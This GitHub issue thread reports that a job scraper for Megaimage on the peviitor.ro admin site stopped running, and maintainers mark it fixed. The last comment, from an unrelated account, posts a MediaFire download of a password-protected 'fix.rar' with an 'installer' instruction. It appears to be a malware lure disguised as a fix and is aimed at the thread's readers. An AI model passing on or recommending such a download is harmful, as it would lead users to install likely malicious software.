### ISSUE TITLE
Scraper for Megaimage is not running

### ISSUE THREAD

**Issue by Cristian-Emil** [peviitor-ro/validator-ui#275]
URL: https://admin.peviitor.ro/
Browser: Chrome
Device: Laptop
OS: Windows 10

STEPS TO REPRODUCE:
Open the URL "https://admin.peviitor.ro/" in the browser - Google Chrome
Insert "Megaimage" on search box, press enter
Click on Megaimage icon and check the chart
Click on "Cont"
Click on "+" from "based_scraper_py"
Click on "megaimage.py" and run the scraper

EXPECTED RESULTS:
The scraper should run without problem.

ACTUAL RESULTS:
The scraper does not run from August 14th, 2024 and an error pop-up.
See below screenshot:

![image](https://github.com/user-attachments/assets/8e8ee9b2-6e9d-4d65-92d3-00cbd10e5ee0)

![image](https://github.com/user-attachments/assets/c8e3c695-62f8-4bd4-ae51-70056301b98c)

**Comment by lalalaurentiu** [comment]
La asta lucram 😅

**Comment by Cristian-Emil** [comment]
OK. Astept sa-mi spui cand sa-l verific de "gandaci"!

**Comment by lalalaurentiu** [comment]
Fixed...

**Comment by mayank785** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
